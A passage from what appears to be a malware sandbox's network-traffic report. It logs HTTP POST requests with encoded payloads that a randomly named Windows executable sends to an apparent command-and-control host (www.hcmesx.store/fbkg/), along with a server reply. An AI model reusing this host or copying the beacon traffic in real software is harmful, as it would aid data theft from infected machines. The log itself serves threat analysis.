                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 59 55 7a 39 56 32 6f 71 50 73 4a 38 68 42 36 49 75 4e 67 6a 35 75 73 56 55 33 72 64 41 6d 72 34 52 74 59 67 72 4b 77 75 4a 32 55 69 6c 73 7a 65 4e 54 4a 49 42 6f 49 4d 71 66 67 66 2f 51 4c 75 6f 6b 6e 2f 67 73 31 6d 7a 6f 2f 6f 37 4d 4c 75 41 77 54 61 79 50 46 67 38 43 62 73 72 4d 70 61 34 4c 39 4e 71 76 76 6a 56 69 44 4b 66 74 4d 36 4d 58 75 52 78 4a 71 7a 53 6f 57 65 4b 32 52 6e 42 64 41 37 4c 35 48 53 6e 6e 79 32 52 73 44 6c 73 75 6e 2f 68 54 59 37 67 2f 2b 79 73 52 72 79 47 48 55 52 46 68 61 43 45 35 69 5a 2f 39 58 48 70 77 4d 58 79 55 4e 65 72 48 44 55 6d 44 5a 69 53 74 6b 2b 78 78 52 76 65 75 39 63 71 4f 79 64 6a 64 48 46 75 59 47 59 6a 43 76 71 6e 48 44 72 45 31 4c 33 62 4f 4a 43 73 68 69 6d 33 68 67 38 78 66 76 4d 7a 68 63 42 4b 61 44 52 77 78 78 4c 4b 6a 2b 6e 52 4f 42 56 72 4d 71 42 2b 49 4a 45 4c 31 65 77 78 74 6b 71 33 66 31 5a 5a 41 56 4d 6b 54 38 33 50 68 4b 79 70 7a 55 44 70 42 7a 35 37 6b 37 57 4e 59 2f 6b 34 76 33 73 31 41 57 30 54 4e 38 2f 42 35 4a 67 52 50 59 31 46 56 5a 55 48 6d 43 4c 43 49 67 4f 4e 38 64 69 5a 43 6f 63 35 4f 6c 35 68 65 52 42 35 57 58 61 73 43 66 75 47 79 70 42 75 65 45 32 59 69 6c 2b 4e 6a 63 38 33 77 6a 37 6d 61 2f 77 41 73 66 6f 63 52 45 72 46 33 42 4f 2f 30 76 6d 42 55 78 52 52 54 47 50 44 63 6d 6e 76 42 42 30 54 77 61 66 6e 70 55 6a 69 6e 78 4e 2f 6a 66 4d 64 6d 35 6b 75 6a 57 7a 72 72 4c 46 55 4d 4b 58 6b 58 43 39 33 61 48 67 74 5a 76 59 57 65 63 78 48 37 6e 35 5a 6b 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Aizhm0f7Z9425ghKXZrs5G6gswHIZhJYUz9V2oqPsJ8hB6IuNgj5usVU3rdAmr4RtYgrKwuJ2UilszeNTJIBoIMqfgf/QLuokn/gs1mzo/o7MLuAwTayPFg8CbsrMpa4L9NqvvjViDKftM6MXuRxJqzSoWeK2RnBdA7L5HSnny2RsDlsun/hTY7g/+ysRryGHURFhaCE5iZ/9XHpwMXyUNerHDUmDZiStk+xxRveu9cqOydjdHFuYGYjCvqnHDrE1L3bOJCshim3hg8xfvMzhcBKaDRwxxLKj+nROBVrMqB+IJEL1ewxtkq3f1ZZAVMkT83PhKypzUDpBz57k7WNY/k4v3s1AW0TN8/B5JgRPY1FVZUHmCLCIgON8diZCoc5Ol5heRB5WXasCfuGypBueE2Yil+Njc83wj7ma/wAsfocRErF3BO/0vmBUxRRTGPDcmnvBB0TwafnpUjinxN/jfMdm5kujWzrrLFUMKXkXC93aHgtZvYWecxH7n5Zk=
                                                                                                                                                                                                Nov 17, 2023 19:26:39.007271051 CET367INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:39 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                9192.168.11.205013638.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:41.526483059 CET380OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 65 4d 7a 39 6e 2b 6f 72 73 55 4a 39 68 42 36 4a 75 4e 68 6a 35 75 68 56 51 61 67 64 41 6a 51 34 54 6c 59 67 37 36 77 76 36 65 55 6e 6c 73 49 62 4e 54 48 66 52 70 52 4d 71 54 30 66 2f 73 39 75 59 51 6e 2b 6a 59 31 78 30 30 38 6d 4c 4e 43 75 41 77 68 65 79 50 33 67 38 47 4c 73 72 41 70 61 2b 54 39 4d 5a 58 76 6d 45 69 44 53 2f 74 50 77 73 58 71 59 52 4a 6c 7a 53 74 76 65 4b 32 72 6e 41 5a 41 37 4d 4e 48 52 6d 6e 78 32 78 73 44 35 63 75 6b 73 78 66 63 37 67 6a 6d 79 73 4e 72 79 45 58 55 52 6c 68 61 47 58 68 74 4f 76 39 52 56 5a 77 62 54 79 59 2f 65 71 6d 6b 55 6a 54 5a 69 69 35 6b 2f 47 74 52 67 66 75 39 65 4b 4f 77 5a 6a 63 44 65 65 59 43 59 6a 79 43 71 6d 6e 39 72 46 64 4c 33 35 57 4a 55 64 68 74 6b 58 68 71 32 52 66 2b 49 7a 64 51 42 4a 79 66 52 77 78 62 4c 4c 6e 2b 6e 68 2b 42 57 76 59 70 43 75 4a 42 4f 62 30 57 70 42 70 35 71 33 54 39 5a 5a 59 46 4d 6e 2f 38 78 66 68 4b 35 75 76 4c 59 70 42 2b 78 62 6b 54 59 74 5a 33 6b 34 71 6b 73 31 6f 73 30 6a 78 38 2b 78 70 4a 6b 42 50 62 2b 46 56 64 4e 58 6d 4d 64 79 49 67 4f 4e 77 52 69 5a 2b 6f 66 4c 65 6c 34 53 57 52 46 6f 57 58 4b 63 43 64 75 47 79 61 42 75 53 4e 32 59 36 48 2b 4e 54 69 38 31 63 6a 36 33 4b 2f 31 42 73 41 39 38 52 42 68 6c 33 6f 44 66 34 47 6d 41 34 70 52 52 43 37 50 54 67 6d 6d 72 6c 42 77 54 77 46 4b 33 70 54 6b 69 6d 6b 63 76 75 65 4d 64 37 47 6b 76 57 4c 7a 73 33 4c 45 67 31 4c 51 56 6e 2f 6b 30 71 31 2f 4e 64 4d 55 31 65 32 73 47 58 74 37 66 6c 43 6d 62 36 34 38 42 41 45 69 59 65 6f 77 6a 6b 31 57 58 48 4d 32 38 32 61 63 51 47 4e 73 6c 66 6a 2b 66 35 4a 6f 53 36 6b 4d 6f 68 75 78 74 61 76 6c 56 52 59 38 69 6e 43 32 42 4a 59 68 69 4e 57 65 65 48 37 31 78 4b 63 48 56 39 79 77 42 6c 42 44 45 33 4b 55 37 78 61 67 69 4b 2f 2b 64 35 54 30 4a 2f 58 50 4c 73 61 5a 69 43 4b 64 66 4c 66 48 77 66 58 67 63 72 70 35 63 41 47 67 55 6f 34 46 54 4b 75 7a 56 2b 4c 64 59 6a 52 75 75 69 73 68 71 30 47 49 4f 36 68 52 30 36 36 7a 6b 4a 78 48 6f 31 71 31 55 76 73 6e 77 5a 31 6e 33 55 47 38 61 39 7a 2f 50 6c 44 6e 79 4d 6d 75 53 55 4c 41 7a 64 45 53 76 69 5a 48 70 72 51 75 6a 34 34 36 74 44 7a 77 45 68 64 6e 4e 51 31 57 79 71 55 44 78 76 67 6e 61 78 6c 79 5a 4d 34 2f 4f 73 62 48 66 2f 72 77 58 42 57 59 51 52 49 38 45 67 54 5a 30 4b 4a 48 76 53 66 46 66 44 5a 4e 45 36 58 50 58 39 67 49 38 57 50 69 6b 6d 63 4f 63 32 6f 4d 6b 2f 50 62 75 68 42 72 58 51 61 63 52 4b 45 58 68 35 61 63 6b 6d 73 44 4a 69 78 30 2b 70 7a 2b 44 79 71 39 6f 31 56 45 2b 67 52 36 79 78 6c 62 50 6c 35 71 4f 35 4c 48 32 66 58 4d 71 64 34 5a 55 36 7a 6c 4d 75 73 38 38 45 72 59 73 6b 69 37 69 5a 64 6f 53 36 78 46 4c 72 6b 76 6e 2f 43 59 43 66 75 4d 79 64 66 52 55 5a 6b 56 4e 77 70 35 6a 39 57 48 2f 52 48 56 6b 36 74 64 6e 77 49 43 70 53 54 69 49 4f 4e 30 34 72 36 74 64 38 76 6e 42 5a 4e 4f 42 57 74 79 42 6a 4f 69 65 77 4c 65 72 4c 2f 76 39 6d 35 7a 6e 6f 32 30 68 38 67 34 6a 46 68 57 39 61 67 6b 30 46 67 73 34 30 4b 42 55 66 5a 52 50 61 78 6b 50 75 4c 69 63 7a 58 34 76 39 32 33 45 41 45 6b 55 61 45 42 5a 4f 45 65 58 58 61 52 52 6f 44 32 67 75 6b 4f 6c 52 42 30 53 57 5a 68 69 36 6c 38 38 4b 4c 2b 50 7a 77 50 7a 5a 49 65 54 47 73 71 54 55 33 56 61 38 61 73 31 6f 79 54 78 78 70 55 31 39 4c 49 4e 6e 76 41 44 41 77 71 66 34 68 58 46 49 79 35 52 2b 59 33 6a 52 30 71 48 79 55 44 30 66 74 56 42 36 32 56 2f 55 70 69 39 57 31 79 75 37 30 63 78 78 32 67 68 71 73 77 4d 54 50 44 38 73 61 51 64 41 72 52 6e 71 7a 69 76 4a 41 2b 53 53 70 50 32 4e 57 54 71 5a 46 66 35 4b 4e 56 49 44 51 6b 64 59 4b 42 4f 62 2b 35 38 6f 68 49 31 53 2b 6c 66 68 37 4b 4e 31 6b 33 67 73 76 4a 47 69 64 6a 4a 37 6f 69 75 50 70 59 4c 73 52 6d 64 51 68 4e 71 4d 30 59 32 66 70 39 47 6e 7a 39 36 48 7a 68 66 46 52 32 49 74 43 43 34 2b 32 79 4f 2b 63 38 51 30 4c 44 65 66 4a 51 7a 55 43 6d 61 6e 67 6b 52 4a 61 37 30 63 6a 34 4e 46 59 43 39 75 4b 4e 55 5a 62 35 43 51 4f 6a 58 6f 57 37 38 55 5a 77 6b 46 6d 77 6b 6e 51 54 44 37 4f 4a 6e 37 75 74 77 6e 4d 30 2b 74 74 30 4f 49 4c 70 63 67 4b 57 47 68 56 70 53 59 45 54 35 2b
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:26:41.693949938 CET388OUTData Raw: 4d 31 4d 2b 68 63 46 7a 65 62 58 4e 51 79 6a 31 57 31 51 35 62 30 51 4f 46 6a 71 63 63 71 7a 37 45 38 65 6d 66 6f 78 31 6c 6e 30 48 37 53 69 71 7a 35 37 50 66 71 50 63 79 4d 49 36 35 2f 74 37 77 4d 59 4a 4e 79 6c 6c 74 35 58 33 37 6b 59 2b 4e 4e
                                                                                                                                                                                                Data Ascii: M1M+hcFzebXNQyj1W1Q5b0QOFjqccqz7E8emfox1ln0H7Siqz57PfqPcyMI65/t7wMYJNyllt5X37kY+NNv07jClbKc7SLsRwMK85BtdxjYZsczKFWBmZ8eZcGQVyiUw20j62q3qk361bAAXM4kmE8yp7BxwrPfSJOeCJYIVIHMixaaIh/TlVCivpvV6foQ2ykZDNFG346w2bVLjMGawFRBVQqjaVQQRPcJHPQDPmXp6HxG2Ayv
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694132090 CET389OUTData Raw: 5a 2f 4e 53 56 7a 32 51 4f 57 48 4a 71 74 33 2f 47 6a 71 54 71 55 6f 36 57 33 77 42 62 41 52 56 49 6e 6a 32 73 61 63 70 79 76 53 67 63 79 48 68 4b 49 79 75 59 6b 67 69 6c 4a 37 6d 42 43 75 72 4c 4e 37 4a 57 61 43 52 2f 58 56 30 4d 72 76 31 6e 67
                                                                                                                                                                                                Data Ascii: Z/NSVz2QOWHJqt3/GjqTqUo6W3wBbARVInj2sacpyvSgcyHhKIyuYkgilJ7mBCurLN7JWaCR/XV0Mrv1ngVCvqZFt2yO919b3CYqK5a9eFCf34j6oxlmn+eVBvVWVhiVoCnn+WwUDy+OL0p3twXeiUcHVXLf5a8bvwNgCj/EcJppD16PVGgEQ1XEF5D/1tkJAyFAYNjarT2ORRdL/LhLHypkrTOcNivsPiHOQjVS+i/lJkQDjK+
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694304943 CET396OUTData Raw: 50 63 33 39 76 58 34 77 43 76 79 42 72 72 54 69 52 2f 74 2b 6d 61 4c 59 50 63 58 5a 4b 4b 34 50 66 2f 54 6c 2f 42 48 63 69 31 56 34 36 78 4a 2b 50 45 2f 7a 6a 66 58 4e 6c 74 71 45 79 67 64 4c 2b 55 4c 6d 68 56 49 6a 30 41 4c 43 52 4b 57 58 6a 59
                                                                                                                                                                                                Data Ascii: Pc39vX4wCvyBrrTiR/t+maLYPcXZKK4Pf/Tl/BHci1V46xJ+PE/zjfXNltqEygdL+ULmhVIj0ALCRKWXjYdMH0ZdwX1jRg2YX9W/XJ5yWtpGJ65QOAJ18N3S8phhIlkKfYlQS1EinNIy6EDQ3ExXqrlLLT6tD7whV8prxxecevPIKkG2wPK472/ajMVjOIQ6E/9Rw/JJb+51x9NlQ7Q7mMWbqTeD40oGCZAc3483w6wXzZqGncP
                                                                                                                                                                                                Nov 17, 2023 19:26:41.694833040 CET397OUTData Raw: 58 34 39 78 74 37 49 30 75 58 2b 69 61 6c 4c 2b 48 4d 76 73 71 64 72 68 64 48 45 61 4c 41 46 2b 4d 53 4e 71 67 46 6f 33 50 58 36 73 73 43 4a 71 69 62 33 36 35 78 44 4e 53 4a 32 41 51 70 72 2f 64 72 59 35 4d 75 62 61 42 42 31 77 62 66 52 55 42 33
                                                                                                                                                                                                Data Ascii: X49xt7I0uX+ialL+HMvsqdrhdHEaLAF+MSNqgFo3PX6ssCJqib365xDNSJ2AQpr/drY5MubaBB1wbfRUB3cJZNORyUN+ntE3iIDaXS3+1Yp9QQRHW8GdZcbOEbGMBgcKIlQLX7X164/y6vb2rkuMG6oK/JL4KSpgmdHtykQK1JTjoB0saNcP/UuJoADL3iSDSHrGtBkyAYUvS5i9D2gS+qym/5+3m77uaa2ouKBUX9nH+qP6CPZ
                                                                                                                                                                                                Nov 17, 2023 19:26:41.695015907 CET404OUTData Raw: 66 4a 70 6b 41 65 75 62 39 34 34 53 71 71 37 71 53 50 6e 64 42 56 4a 32 6e 71 34 64 2b 53 4f 56 53 53 43 52 32 31 4f 5a 72 54 54 4f 4a 69 4c 43 62 77 74 65 4c 39 65 6f 32 4d 64 77 2b 50 56 68 43 72 61 66 79 4f 31 7a 59 5a 6c 77 69 48 5a 5a 61 44
                                                                                                                                                                                                Data Ascii: fJpkAeub944Sqq7qSPndBVJ2nq4d+SOVSSCR21OZrTTOJiLCbwteL9eo2Mdw+PVhCrafyO1zYZlwiHZZaDCc1GrL0TKR+uGGcwo0/XBirg5xXF82U7Jq3EIpmjmXnZMB1sndyeVz1LlQWaoTv3IWN2O+I496R3e13qqoAtel4zjv+O1VN7WjkZ7w9XBOLLGSSN3wrJ1noP+Xxpb1e6S10N7f5nYtSIaMoppRMjDfn6JyedG2otw
                                                                                                                                                                                                Nov 17, 2023 19:26:41.695091963 CET406OUTData Raw: 72 6b 67 50 4e 6c 50 6d 32 6c 6c 46 48 75 30 6c 52 6f 6e 6b 45 6a 30 6b 37 6e 49 32 47 71 6d 61 2f 34 42 52 31 37 65 62 67 62 71 2b 44 6b 34 5a 73 56 64 4b 4c 48 69 59 49 59 41 6f 53 58 56 35 6b 72 4b 34 43 39 54 38 6c 70 4e 62 32 4c 42 59 79 34
                                                                                                                                                                                                Data Ascii: rkgPNlPm2llFHu0lRonkEj0k7nI2Gqma/4BR17ebgbq+Dk4ZsVdKLHiYIYAoSXV5krK4C9T8lpNb2LBYy4KVjlrmLHmSNm9MgS7BoaMIy+TDUEA5vMCr6y8/iIz+Vcqxg8+zNyGr9jxVPKKizmSWQhp2p/Ax6egsonNAo4ipIJngbJRX+BdVxzSvSJegVIvb81wtOSfKghkQ0PkMaaFaBxsWdcg44XDUj48CpN0D4Uzd5Ug2eKu
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860650063 CET408OUTData Raw: 6a 31 65 58 70 46 53 55 4a 66 69 56 70 54 77 78 5a 52 34 50 70 36 34 52 58 6e 44 39 6d 39 39 48 5a 73 56 54 32 77 54 56 52 68 4b 42 6f 72 78 2f 56 5a 34 34 31 4e 4c 4f 41 45 79 35 61 65 31 47 69 36 59 6b 53 58 37 2b 30 57 68 4e 79 6e 53 4a 33 69
                                                                                                                                                                                                Data Ascii: j1eXpFSUJfiVpTwxZR4Pp64RXnD9m99HZsVT2wTVRhKBorx/VZ441NLOAEy5ae1Gi6YkSX7+0WhNynSJ3iycP/pxmin/qvKwy5tIe0Nk/+YWtmfrbW797OyprzOYO+W3PXJYMpHZDwHClUYiJg89s56R2CcyNSswjJjMaSJjwQcfAnzmCVGzCULUWtT/ASBY07pY2Lz22zusoRT5Y1GlzJXhacPNWerMAgRnmCeIKVtKFADXjAO
                                                                                                                                                                                                Nov 17, 2023 19:26:41.860825062 CET414OUTData Raw: 2f 68 4e 30 6c 75 7a 6c 30 53 66 37 6f 37 34 72 39 62 38 45 6c 39 4d 64 5a 57 6a 4a 71 6e 36 34 76 58 43 6d 32 30 59 7a 56 48 35 76 54 4a 73 31 66 32 62 74 33 43 71 45 79 6f 68 44 5a 4f 41 31 52 64 65 64 48 32 30 65 4d 50 61 61 4f 73 61 6c 4d 6d
                                                                                                                                                                                                Data Ascii: /hN0luzl0Sf7o74r9b8El9MdZWjJqn64vXCm20YzVH5vTJs1f2bt3CqEyohDZOA1RdedH20eMPaaOsalMmuzPPjgc3jfqAzxyqyCPP3F+u1MFSNUM3VC+VU6q1iBQk2ftst6cjzAD9CpNtRpbDuLB/SEq4PSYnqTu7IVnnlAaNIcm4+0VOojFpVA2IYnG+8WBt6mtYEVBRdnvRqSC8yZTJJPK6aQqAf+jAir/y8YZxqC7+GA+W4
                                                                                                                                                                                                Nov 17, 2023 19:26:41.861140013 CET415OUTData Raw: 79 39 31 6e 51 59 33 4c 6d 43 4a 70 57 66 43 39 6f 31 31 4b 39 6b 2f 56 4f 6f 48 4e 71 4b 77 75 6e 34 4e 4b 61 79 69 7a 32 31 42 4d 4c 74 62 33 32 43 63 66 59 63 4c 79 6b 78 59 6b 72 4e 73 4d 73 56 56 34 73 56 36 65 76 45 77 67 48 7a 65 2b 30 50
